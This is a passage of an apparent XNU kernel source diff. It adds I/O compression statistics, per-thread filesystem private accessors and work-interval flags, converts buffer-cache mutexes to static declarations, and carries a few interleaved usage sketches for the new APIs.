+#define IOCS_BUFFER_NUM_SIZE_BUCKETS         10
+#define IOCS_BUFFER_MAX_BUCKET               9
+#define IOCS_BUFFER_NUM_COMPRESSION_BUCKETS  7
+#define IOCS_BLOCK_NUM_SIZE_BUCKETS          16
+
+struct io_compression_stats {
+       uint64_t uncompressed_size;
+       uint64_t compressed_size;
+       uint32_t buffer_size_compression_dist[IOCS_BUFFER_NUM_SIZE_BUCKETS][IOCS_BUFFER_NUM_COMPRESSION_BUCKETS];
+       uint32_t block_compressed_size_dist[IOCS_BLOCK_NUM_SIZE_BUCKETS];
+};
+typedef struct io_compression_stats *io_compression_stats_t;
+
+#define IOCS_SBE_PATH_LEN             128
+#define IOCS_PATH_START_BYTES_TO_COPY 108
+#define IOCS_PATH_END_BYTES_TO_COPY   20 /* Includes null termination */
+
+#define IOCS_SYSCTL_LIVE                  0x00000001
+#define IOCS_SYSCTL_STORE_BUFFER_RD_ONLY  0x00000002
+#define IOCS_SYSCTL_STORE_BUFFER_MARK     0x00000004
+
+struct iocs_store_buffer_entry {
+       char     path_name[IOCS_SBE_PATH_LEN];
+       struct io_compression_stats iocs;
+};
+
 #endif /* !_VNODE_H_ */
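A sketch of how a filesystem might use the new per-thread private field declared above (only FS_PRIVATE_TAG_APFS is accepted); the wrapper function and the stored marker value are illustrative, not part of this commit. Because the field is shared by every filesystem on the thread, the previous value is saved and restored around the operation.

static int
example_vnop_wrapper(void)
{
        uint64_t saved = 0;

        if (vfs_get_thread_fs_private(FS_PRIVATE_TAG_APFS, &saved) != 0) {
                return ENOTSUP;
        }
        /* Hypothetical marker consumed by the same filesystem deeper in the call chain. */
        vfs_set_thread_fs_private(FS_PRIVATE_TAG_APFS, 0x1);

        /* ... work that may re-enter the VFS on this thread ... */

        vfs_set_thread_fs_private(FS_PRIVATE_TAG_APFS, saved);
        return 0;
}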
index a25c11c3e36f3f63b81de0c6761f16a0d52d5c30..4af412789330f2d9743d99dccbd2bbfaea3d7b17 100644 (file)
@@ -121,7 +121,7 @@ typedef struct vnode_resolve *vnode_resolve_t;
  * v_freelist is locked by the global vnode_list_lock
  * v_mntvnodes is locked by the mount_lock
  * v_nclinks and v_ncchildren are protected by the global name_cache_lock
- * v_cleanblkhd and v_dirtyblkhd and v_iterblkflags are locked via the global buf_mtxp
+ * v_cleanblkhd and v_dirtyblkhd and v_iterblkflags are locked via the global buf_mtx
  * the rest of the structure is protected by the vnode_lock
  */
 struct vnode {
@@ -184,6 +184,9 @@ struct vnode {
                                                 *  if VFLINKTARGET is set, if  VFLINKTARGET is not
                                                 *  set, points to target */
 #endif /* CONFIG_FIRMLINKS */
+#if CONFIG_IO_COMPRESSION_STATS
+       io_compression_stats_t io_compression_stats;            /* IO compression statistics */
+#endif /* CONFIG_IO_COMPRESSION_STATS */
 };
 
 #define v_mountedhere   v_un.vu_mountedhere
@@ -621,6 +624,19 @@ int     vnode_isinuse_locked(vnode_t, int, int );
 
 #endif /* BSD_KERNEL_PRIVATE */
 
+#if CONFIG_IO_COMPRESSION_STATS
+/*
+ * update the IO compression stats tracked at block granularity
+ */
+int vnode_updateiocompressionblockstats(vnode_t vp, uint32_t size_bucket);
+
+/*
+ * update the IO compression stats tracked for the buffer
+ */
+int vnode_updateiocompressionbufferstats(vnode_t vp, uint64_t uncompressed_size, uint64_t compressed_size, uint32_t size_bucket, uint32_t compression_bucket);
+
+#endif /* CONFIG_IO_COMPRESSION_STATS */
+
 extern bool rootvp_is_ssd;
 
 #endif /* !_SYS_VNODE_INTERNAL_H_ */
index 48049016ffa59246756e18442d5a3e594e58eeea..c38709f5bfb23bfbfa07dc7156923307bfe2cd22 100644 (file)
@@ -56,11 +56,8 @@ struct vsockpcb {
 
 struct vsockpcbinfo {
        // PCB locking.
-       lck_attr_t *vsock_lock_attr;
-       lck_grp_t *vsock_lock_grp;
-       lck_grp_attr_t *vsock_lock_grp_attr;
-       lck_rw_t *all_lock;
-       lck_rw_t *bound_lock;
+       lck_rw_t all_lock;
+       lck_rw_t bound_lock;
        // PCB lists.
        TAILQ_HEAD(, vsockpcb) all;
        LIST_HEAD(, vsockpcb) bound;
index 91567cf8359f21840085c42ef3b4455cb5855452..b4d04f87b45767480eccda642924d6effe432ed1 100644 (file)
@@ -154,6 +154,10 @@ __BEGIN_DECLS
 /* Kernel-supplied flag: Work interval has been ignored by the kernel */
 #define WORK_INTERVAL_FLAG_IGNORED                      (0x20)
 
+/* Specifies that the work interval requests the system to provide just enough performance
+ * to be able to finish at the provided deadline and no sooner. */
+#define WORK_INTERVAL_FLAG_FINISH_AT_DEADLINE           (0x40)
+
 /* Flags to describe the interval flavor to the performance controller */
 #define WORK_INTERVAL_TYPE_MASK                 (0xF0000000)
 #define WORK_INTERVAL_TYPE_DEFAULT              (0x0 << 28)
@@ -163,6 +167,7 @@ __BEGIN_DECLS
 #define WORK_INTERVAL_TYPE_CA_CLIENT            (0x3 << 28)
 #define WORK_INTERVAL_TYPE_HID_DELIVERY         (0x4 << 28)
 #define WORK_INTERVAL_TYPE_COREMEDIA            (0x5 << 28)
+#define WORK_INTERVAL_TYPE_ARKIT                (0x6 << 28)
 #define WORK_INTERVAL_TYPE_LAST                 (0xF << 28)
 
 #ifndef KERNEL
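A hedged userspace sketch of the new flag (the work_interval_create() call and the type flag chosen here are assumptions based on the rest of <sys/work_interval.h>, which is not shown in this hunk): a client that only needs to make its deadline, and gains nothing from finishing early, would OR the flag into its create flags.

#include <sys/work_interval.h>

static int
example_create_deadline_interval(work_interval_t *wi)
{
        /* Hypothetical flag combination; only FINISH_AT_DEADLINE is new in this change. */
        return work_interval_create(wi,
            WORK_INTERVAL_TYPE_COREMEDIA | WORK_INTERVAL_FLAG_FINISH_AT_DEADLINE);
}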
index 6444ea6f49f072ddb8244691175b77637ae99c32..bab6520e7338c51e58c40684fb6f1af8af73d3c3 100644 (file)
@@ -196,9 +196,11 @@ __API_AVAILABLE(macos(10.15), ios(13), tvos(13), watchos(6));
 #define MACH_BRIDGE_OBSV_RATE   0x7     /* out of range observed rates */
 
 /* DBG_SKYWALK has same toplevel code as DBG_DLIL, so don't reuse subcodes */
+#define DBG_SKYWALK_ALWAYSON    0x10
 #define DBG_SKYWALK_FLOWSWITCH  0x11
 #define DBG_SKYWALK_NETIF       0x12
 #define DBG_SKYWALK_CHANNEL     0x13
+#define DBG_SKYWALK_PACKET      0x14
 
 #define PPT_TEST            0x01
 #define PPT_JETSAM_HIWAT    0x02
index debde98cf4961eb8fb73bc49542b11ac4a79ae24..cdb70d82165408ead52ad5a78fa44e0582f16d33 100644 (file)
@@ -69,6 +69,7 @@ struct xnupost_test bsd_post_tests[] = {
 #ifdef __arm64__
        XNUPOST_TEST_CONFIG_BASIC(arm64_lock_test),
 #endif
+#if !KASAN // <rdar://71151361>
 #if defined(__arm__) || defined(__arm64__)
        XNUPOST_TEST_CONFIG_BASIC(pmap_test),
 #endif /* defined(__arm__) || defined(__arm64__) */
@@ -78,12 +79,15 @@ struct xnupost_test bsd_post_tests[] = {
 #if __ARM_PAN_AVAILABLE__
        XNUPOST_TEST_CONFIG_BASIC(arm64_late_pan_test),
 #endif
+#endif /* !KASAN */
        XNUPOST_TEST_CONFIG_BASIC(kalloc_test),
        XNUPOST_TEST_CONFIG_BASIC(ipi_test),
 #if HAS_TWO_STAGE_SPR_LOCK
        XNUPOST_TEST_CONFIG_BASIC(arm64_spr_lock_test),
 #endif
+#if !KASAN
        XNUPOST_TEST_CONFIG_BASIC(copyio_test),
+#endif /* !KASAN */
 };
 
 uint32_t bsd_post_tests_count = sizeof(bsd_post_tests) / sizeof(xnupost_test_data_t);
index 0b4f7a6285050c10b7993e43c3008ceb7f16805d..3efc8573649267ffb40bdba56c16cbfd0176a821 100644 (file)
@@ -145,7 +145,7 @@ static void xattrfile_setattr(vnode_t dvp, const char * basename,
     struct vnode_attr * vap, vfs_context_t ctx);
 #endif /* CONFIG_APPLEDOUBLE */
 
-extern lck_rw_t *rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 
 static errno_t post_rename(vnode_t fdvp, vnode_t fvp, vnode_t tdvp, vnode_t tvp);
 
@@ -1525,6 +1525,36 @@ vfs_context_bind(vfs_context_t ctx)
        return 0;
 }
 
+int
+vfs_set_thread_fs_private(uint8_t tag, uint64_t fs_private)
+{
+       struct uthread *ut;
+
+       if (tag != FS_PRIVATE_TAG_APFS) {
+               return ENOTSUP;
+       }
+
+       ut = get_bsdthread_info(current_thread());
+       ut->t_fs_private = fs_private;
+
+       return 0;
+}
+
+int
+vfs_get_thread_fs_private(uint8_t tag, uint64_t *fs_private)
+{
+       struct uthread *ut;
+
+       if (tag != FS_PRIVATE_TAG_APFS) {
+               return ENOTSUP;
+       }
+
+       ut = get_bsdthread_info(current_thread());
+       *fs_private = ut->t_fs_private;
+
+       return 0;
+}
+
 int
 vfs_isswapmount(mount_t mnt)
 {
@@ -1567,9 +1597,9 @@ vfs_rootvnode(void)
 {
        int error;
 
-       lck_rw_lock_shared(rootvnode_rw_lock);
+       lck_rw_lock_shared(&rootvnode_rw_lock);
        error = vnode_get(rootvnode);
-       lck_rw_unlock_shared(rootvnode_rw_lock);
+       lck_rw_unlock_shared(&rootvnode_rw_lock);
        if (error) {
                return (vnode_t)0;
        } else {
index 6f3b17ae61a18744b1363b7c7cf70a0807236ae8..b9bd4bb4cbd34f8ea16269d2c8fd112458189e93 100644 (file)
@@ -167,12 +167,11 @@ static TAILQ_HEAD(bqueues, buf) bufqueues[BQUEUES];
 static int needbuffer;
 static int need_iobuffer;
 
-static lck_grp_t        *buf_mtx_grp;
-static lck_attr_t       *buf_mtx_attr;
-static lck_grp_attr_t   *buf_mtx_grp_attr;
-static lck_mtx_t        *iobuffer_mtxp;
-static lck_mtx_t        *buf_mtxp;
-static lck_mtx_t        *buf_gc_callout;
+static LCK_GRP_DECLARE(buf_mtx_grp, "buffer cache");
+static LCK_ATTR_DECLARE(buf_mtx_attr, 0, 0);
+static LCK_MTX_DECLARE_ATTR(iobuffer_mtxp, &buf_mtx_grp, &buf_mtx_attr);
+static LCK_MTX_DECLARE_ATTR(buf_mtx, &buf_mtx_grp, &buf_mtx_attr);
+static LCK_MTX_DECLARE_ATTR(buf_gc_callout, &buf_mtx_grp, &buf_mtx_attr);
 
 static uint32_t buf_busycount;
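The declarations above are part of a commit-wide move away from boot-time lck_grp_alloc_init()/lck_mtx_alloc_init() calls (removed from bufinit() further down) toward statically declared locks. A sketch of the pattern for a hypothetical subsystem, mirroring the buf_mtx conversion; callers now take the lock's address instead of dereferencing a pointer variable allocated at boot.

static LCK_GRP_DECLARE(example_lck_grp, "example");
static LCK_ATTR_DECLARE(example_lck_attr, 0, 0);
static LCK_MTX_DECLARE_ATTR(example_mtx, &example_lck_grp, &example_lck_attr);

static void
example_critical_section(void)
{
        lck_mtx_lock(&example_mtx);    /* previously: lck_mtx_lock(example_mtxp) on an allocated lock */
        /* ... critical section ... */
        lck_mtx_unlock(&example_mtx);
}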
 
@@ -286,7 +285,7 @@ bremhash(buf_t  bp)
 }
 
 /*
- * buf_mtxp held.
+ * buf_mtx held.
  */
 static __inline__ void
 bmovelaundry(buf_t bp)
@@ -609,6 +608,21 @@ bufattr_ioscheduled(bufattr_t bap)
        return 0;
 }
 
+void
+bufattr_markexpeditedmeta(bufattr_t bap)
+{
+       SET(bap->ba_flags, BA_EXPEDITED_META_IO);
+}
+
+int
+bufattr_expeditedmeta(bufattr_t bap)
+{
+       if ((bap->ba_flags & BA_EXPEDITED_META_IO)) {
+               return 1;
+       }
+       return 0;
+}
+
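A usage sketch for the new accessors above (the call site is hypothetical; buf_attr() is the existing bufattr accessor from <sys/buf.h>, not shown in this hunk): a filesystem that wants a metadata buffer's I/O expedited marks the attribute before the buffer is issued.

static void
example_mark_metadata_buf(buf_t bp)
{
        bufattr_t bap = buf_attr(bp);

        bufattr_markexpeditedmeta(bap);
        assert(bufattr_expeditedmeta(bap) == 1);
}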
 errno_t
 buf_error(buf_t bp)
 {
@@ -896,7 +910,7 @@ buf_create_shadow_internal(buf_t bp, boolean_t force_copy, uintptr_t external_st
                }
                *(buf_t *)(&io_bp->b_orig) = bp;
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                io_bp->b_lflags |= BL_SHADOW;
                io_bp->b_shadow = bp->b_shadow;
@@ -910,7 +924,7 @@ buf_create_shadow_internal(buf_t bp, boolean_t force_copy, uintptr_t external_st
                        bp->b_data_ref++;
                }
 #endif
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
        } else {
                if (external_storage) {
 #ifdef BUF_MAKE_PRIVATE
@@ -956,7 +970,7 @@ buf_make_private(buf_t bp)
 
        bcopy((caddr_t)bp->b_datap, (caddr_t)my_buf.b_datap, bp->b_bcount);
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        for (t_bp = bp->b_shadow; t_bp; t_bp = t_bp->b_shadow) {
                if (!ISSET(bp->b_lflags, BL_EXTERNAL)) {
@@ -974,7 +988,7 @@ buf_make_private(buf_t bp)
        }
 
        if (ds_bp == NULL) {
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                buf_free_meta_store(&my_buf);
 
@@ -991,7 +1005,7 @@ buf_make_private(buf_t bp)
        bp->b_data_ref = 0;
        bp->b_datap = my_buf.b_datap;
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        KERNEL_DEBUG(0xbbbbc004 | DBG_FUNC_END, bp, bp->b_shadow_ref, 0, 0, 0);
        return 0;
@@ -1529,10 +1543,10 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg)
        }
 
        for (i = 0; i < num_lists; i++) {
-               lck_mtx_lock(buf_mtxp);
+               lck_mtx_lock(&buf_mtx);
 
                if (buf_iterprepare(vp, &local_iterblkhd, list[i].flag)) {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
                        continue;
                }
                while (!LIST_EMPTY(&local_iterblkhd)) {
@@ -1548,7 +1562,7 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg)
                                }
                        }
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        retval = callout(bp, arg);
 
@@ -1564,17 +1578,17 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg)
                                if (bp) {
                                        buf_brelse(bp);
                                }
-                               lck_mtx_lock(buf_mtxp);
+                               lck_mtx_lock(&buf_mtx);
                                goto out;
                        case BUF_CLAIMED_DONE:
-                               lck_mtx_lock(buf_mtxp);
+                               lck_mtx_lock(&buf_mtx);
                                goto out;
                        }
-                       lck_mtx_lock(buf_mtxp);
+                       lck_mtx_lock(&buf_mtx);
                } /* while list has more nodes */
 out:
                buf_itercomplete(vp, &local_iterblkhd, list[i].flag);
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
        } /* for each list */
 } /* buf_iterate */
 
@@ -1596,7 +1610,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                return 0;
        }
 
-       lck_mtx_lock(buf_mtxp);
+       lck_mtx_lock(&buf_mtx);
 
        for (;;) {
                if (must_rescan == 0) {
@@ -1604,8 +1618,8 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                         * the lists may not be empty, but all that's left at this
                         * point are metadata or B_LOCKED buffers which are being
                         * skipped... we know this because we made it through both
-                        * the clean and dirty lists without dropping buf_mtxp...
-                        * each time we drop buf_mtxp we bump "must_rescan"
+                        * the clean and dirty lists without dropping buf_mtx...
+                        * each time we drop buf_mtx we bump "must_rescan"
                         */
                        break;
                }
@@ -1642,7 +1656,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                                if (error == EDEADLK) {
                                        /*
                                         * this buffer was marked B_LOCKED...
-                                        * we didn't drop buf_mtxp, so we
+                                        * we didn't drop buf_mtx, so
                                         * we don't need to rescan
                                         */
                                        continue;
@@ -1650,7 +1664,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                                if (error == EAGAIN) {
                                        /*
                                         * found a busy buffer... we blocked and
-                                        * dropped buf_mtxp, so we're going to
+                                        * dropped buf_mtx, so we're going to
                                         * need to rescan after this pass is completed
                                         */
                                        must_rescan++;
@@ -1662,10 +1676,10 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                                 */
                                buf_itercomplete(vp, &local_iterblkhd, VBI_CLEAN);
 
-                               lck_mtx_unlock(buf_mtxp);
+                               lck_mtx_unlock(&buf_mtx);
                                return error;
                        }
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        if (bp->b_flags & B_LOCKED) {
                                KERNEL_DEBUG(0xbbbbc038, bp, 0, 0, 0, 0);
@@ -1675,10 +1689,10 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo)
                        SET(bp->b_flags, B_INVAL);
                        buf_brelse(bp);
 
-                       lck_mtx_lock(buf_mtxp);
+                       lck_mtx_lock(&buf_mtx);
 
                        /*
-                        * by dropping buf_mtxp, we allow new
+                        * by dropping buf_mtx, we allow new
                         * buffers to be added to the vnode list(s)
                         * we'll have to rescan at least once more
                         * if the queues aren't empty
@@ -1717,7 +1731,7 @@ try_dirty_list:
                                if (error == EDEADLK) {
                                        /*
                                         * this buffer was marked B_LOCKED...
-                                        * we didn't drop buf_mtxp, so we
+                                        * we didn't drop buf_mtx, so
                                         * we don't need to rescan
                                         */
                                        continue;
@@ -1725,7 +1739,7 @@ try_dirty_list:
                                if (error == EAGAIN) {
                                        /*
                                         * found a busy buffer... we blocked and
-                                        * dropped buf_mtxp, so we're going to
+                                        * dropped buf_mtx, so we're going to
                                         * need to rescan after this pass is completed
                                         */
                                        must_rescan++;
@@ -1737,10 +1751,10 @@ try_dirty_list:
                                 */
                                buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY);
 
-                               lck_mtx_unlock(buf_mtxp);
+                               lck_mtx_unlock(&buf_mtx);
                                return error;
                        }
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        if (bp->b_flags & B_LOCKED) {
                                KERNEL_DEBUG(0xbbbbc038, bp, 0, 0, 1, 0);
@@ -1755,9 +1769,9 @@ try_dirty_list:
                                buf_brelse(bp);
                        }
 
-                       lck_mtx_lock(buf_mtxp);
+                       lck_mtx_lock(&buf_mtx);
                        /*
-                        * by dropping buf_mtxp, we allow new
+                        * by dropping buf_mtx, we allow new
                         * buffers to be added to the vnode list(s)
                         * we'll have to rescan at least once more
                         * if the queues aren't empty
@@ -1766,7 +1780,7 @@ try_dirty_list:
                }
                buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY);
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return 0;
 }
@@ -1796,7 +1810,7 @@ buf_flushdirtyblks_skipinfo(vnode_t vp, int wait, int flags, const char *msg)
                lock_flags |= BAC_SKIP_NONLOCKED;
        }
 loop:
-       lck_mtx_lock(buf_mtxp);
+       lck_mtx_lock(&buf_mtx);
 
        if (buf_iterprepare(vp, &local_iterblkhd, VBI_DIRTY) == 0) {
                while (!LIST_EMPTY(&local_iterblkhd)) {
@@ -1823,7 +1837,7 @@ loop:
                                }
                                continue;
                        }
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        bp->b_flags &= ~B_LOCKED;
 
@@ -1838,11 +1852,11 @@ loop:
                        }
                        writes_issued++;
 
-                       lck_mtx_lock(buf_mtxp);
+                       lck_mtx_lock(&buf_mtx);
                }
                buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY);
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (wait) {
                (void)vnode_waitforwrites(vp, 0, 0, 0, msg);
@@ -1875,7 +1889,7 @@ loop:
 
 
 /*
- * called with buf_mtxp held...
+ * called with buf_mtx held...
  * this lock protects the queue manipulation
  */
 static int
@@ -1891,7 +1905,7 @@ buf_iterprepare(vnode_t vp, struct buflists *iterheadp, int flags)
 
        while (vp->v_iterblkflags & VBI_ITER) {
                vp->v_iterblkflags |= VBI_ITERWANT;
-               msleep(&vp->v_iterblkflags, buf_mtxp, 0, "buf_iterprepare", NULL);
+               msleep(&vp->v_iterblkflags, &buf_mtx, 0, "buf_iterprepare", NULL);
        }
        if (LIST_EMPTY(listheadp)) {
                LIST_INIT(iterheadp);
@@ -1907,7 +1921,7 @@ buf_iterprepare(vnode_t vp, struct buflists *iterheadp, int flags)
 }
 
 /*
- * called with buf_mtxp held...
+ * called with buf_mtx held...
  * this lock protects the queue manipulation
  */
 static void
@@ -1982,7 +1996,7 @@ bremfree_locked(buf_t bp)
 
 /*
  * Associate a buffer with a vnode.
- * buf_mtxp must be locked on entry
+ * buf_mtx must be locked on entry
  */
 static void
 bgetvp_locked(vnode_t vp, buf_t bp)
@@ -2004,7 +2018,7 @@ bgetvp_locked(vnode_t vp, buf_t bp)
 
 /*
  * Disassociate a buffer from a vnode.
- * buf_mtxp must be locked on entry
+ * buf_mtx must be locked on entry
  */
 static void
 brelvp_locked(buf_t bp)
@@ -2033,7 +2047,7 @@ buf_reassign(buf_t bp, vnode_t newvp)
                printf("buf_reassign: NULL");
                return;
        }
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        /*
         * Delete from old vnode list, if on one.
@@ -2052,7 +2066,7 @@ buf_reassign(buf_t bp, vnode_t newvp)
        }
        bufinsvn(bp, listheadp);
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 }
 
 static __inline__ void
@@ -2112,36 +2126,6 @@ bufinit(void)
                binsheadfree(bp, &iobufqueue, -1);
        }
 
-       /*
-        * allocate lock group attribute and group
-        */
-       buf_mtx_grp_attr = lck_grp_attr_alloc_init();
-       buf_mtx_grp = lck_grp_alloc_init("buffer cache", buf_mtx_grp_attr);
-
-       /*
-        * allocate the lock attribute
-        */
-       buf_mtx_attr = lck_attr_alloc_init();
-
-       /*
-        * allocate and initialize mutex's for the buffer and iobuffer pools
-        */
-       buf_mtxp        = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr);
-       iobuffer_mtxp   = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr);
-       buf_gc_callout  = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr);
-
-       if (iobuffer_mtxp == NULL) {
-               panic("couldn't create iobuffer mutex");
-       }
-
-       if (buf_mtxp == NULL) {
-               panic("couldn't create buf mutex");
-       }
-
-       if (buf_gc_callout == NULL) {
-               panic("couldn't create buf_gc_callout mutex");
-       }
-
        /*
         * allocate and initialize cluster specific global locks...
         */
@@ -2540,7 +2524,7 @@ buf_brelse_shadow(buf_t bp)
 #endif
        int need_wakeup = 0;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        __IGNORE_WCASTALIGN(bp_head = (buf_t)bp->b_orig);
 
@@ -2619,7 +2603,7 @@ buf_brelse_shadow(buf_t bp)
                        need_wakeup = 1;
                }
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (need_wakeup) {
                wakeup(bp_head);
@@ -2809,21 +2793,21 @@ buf_brelse(buf_t bp)
                 */
                buf_release_credentials(bp);
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                if (bp->b_shadow_ref) {
                        SET(bp->b_lflags, BL_WAITSHADOW);
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        return;
                }
                if (delayed_buf_free_meta_store == TRUE) {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 finish_shadow_master:
                        buf_free_meta_store(bp);
 
-                       lck_mtx_lock_spin(buf_mtxp);
+                       lck_mtx_lock_spin(&buf_mtx);
                }
                CLR(bp->b_flags, (B_META | B_ZALLOC | B_DELWRI | B_LOCKED | B_AGE | B_ASYNC | B_NOCACHE | B_FUA));
 
@@ -2855,12 +2839,12 @@ finish_shadow_master:
 
                bp->b_timestamp = buf_timestamp();
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                /*
                 * the buf_brelse_shadow routine doesn't take 'ownership'
                 * of the parent buf_t... it updates state that is protected by
-                * the buf_mtxp, and checks for BL_BUSY to determine whether to
+                * the buf_mtx, and checks for BL_BUSY to determine whether to
                 * put the buf_t back on a free list.  b_shadow_ref is protected
                 * by the lock, and since we have not yet cleared B_BUSY, we need
                 * to check it while holding the lock to insure that one of us
@@ -2883,9 +2867,9 @@ finish_shadow_master:
        if (needbuffer) {
                /*
                 * needbuffer is a global
-                * we're currently using buf_mtxp to protect it
+                * we're currently using buf_mtx to protect it
                 * delay doing the actual wakeup until after
-                * we drop buf_mtxp
+                * we drop buf_mtx
                 */
                needbuffer = 0;
                need_wakeup = 1;
@@ -2893,7 +2877,7 @@ finish_shadow_master:
        if (ISSET(bp->b_lflags, BL_WANTED)) {
                /*
                 * delay the actual wakeup until after we
-                * clear BL_BUSY and we've dropped buf_mtxp
+                * clear BL_BUSY and we've dropped buf_mtx
                 */
                need_bp_wakeup = 1;
        }
@@ -2903,7 +2887,7 @@ finish_shadow_master:
        CLR(bp->b_lflags, (BL_BUSY | BL_WANTED));
        buf_busycount--;
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (need_wakeup) {
                /*
@@ -2936,14 +2920,14 @@ incore(vnode_t vp, daddr64_t blkno)
 
        dp = BUFHASH(vp, blkno);
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        if (incore_locked(vp, blkno, dp)) {
                retval = TRUE;
        } else {
                retval = FALSE;
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return retval;
 }
@@ -2973,7 +2957,7 @@ buf_wait_for_shadow_io(vnode_t vp, daddr64_t blkno)
 
        dp = BUFHASH(vp, blkno);
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        for (;;) {
                if ((bp = incore_locked(vp, blkno, dp)) == NULL) {
@@ -2986,9 +2970,9 @@ buf_wait_for_shadow_io(vnode_t vp, daddr64_t blkno)
 
                SET(bp->b_lflags, BL_WANTED_REF);
 
-               (void) msleep(bp, buf_mtxp, PSPIN | (PRIBIO + 1), "buf_wait_for_shadow", NULL);
+               (void) msleep(bp, &buf_mtx, PSPIN | (PRIBIO + 1), "buf_wait_for_shadow", NULL);
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 }
 
 /* XXX FIXME -- Update the comment to reflect the UBC changes (please) -- */
@@ -3020,7 +3004,7 @@ buf_getblk(vnode_t vp, daddr64_t blkno, int size, int slpflag, int slptimeo, int
        operation &= ~BLK_ONLYVALID;
        dp = BUFHASH(vp, blkno);
 start:
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        if ((bp = incore_locked(vp, blkno, dp))) {
                /*
@@ -3047,7 +3031,7 @@ start:
                                KERNEL_DEBUG((FSDBG_CODE(DBG_FSRW, 396)) | DBG_FUNC_NONE,
                                    (uintptr_t)blkno, size, operation, 0, 0);
 
-                               err = msleep(bp, buf_mtxp, slpflag | PDROP | (PRIBIO + 1), "buf_getblk", &ts);
+                               err = msleep(bp, &buf_mtx, slpflag | PDROP | (PRIBIO + 1), "buf_getblk", &ts);
 
                                /*
                                 * Callers who call with PCATCH or timeout are
@@ -3080,7 +3064,7 @@ start:
                        bremfree_locked(bp);
                        bufstats.bufs_incore++;
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 #ifdef JOE_DEBUG
                        bp->b_owner = current_thread();
                        bp->b_tag   = 1;
@@ -3191,7 +3175,7 @@ start:
                int queue = BQ_EMPTY; /* Start with no preference */
 
                if (ret_only_valid) {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
                        return NULL;
                }
                if ((vnode_isreg(vp) == 0) || (UBCINFOEXISTS(vp) == 0) /*|| (vnode_issystem(vp) == 1)*/) {
@@ -3213,7 +3197,7 @@ start:
                        SET(bp->b_flags, B_INVAL);
                        binshash(bp, &invalhash);
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        buf_brelse(bp);
                        goto start;
@@ -3241,7 +3225,7 @@ start:
 
                bgetvp_locked(vp, bp);
 
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                allocbuf(bp, size);
 
@@ -3251,11 +3235,11 @@ start:
                        /*
                         * buffer data is invalid...
                         *
-                        * I don't want to have to retake buf_mtxp,
+                        * I don't want to have to retake buf_mtx,
                         * so the miss and vmhits counters are done
                         * with Atomic updates... all other counters
                         * in bufstats are protected with either
-                        * buf_mtxp or iobuffer_mtxp
+                        * buf_mtx or iobuffer_mtxp
                         */
                        OSAddAtomicLong(1, &bufstats.bufs_miss);
                        break;
@@ -3391,7 +3375,7 @@ buf_geteblk(int size)
        int queue = BQ_EMPTY;
 
        do {
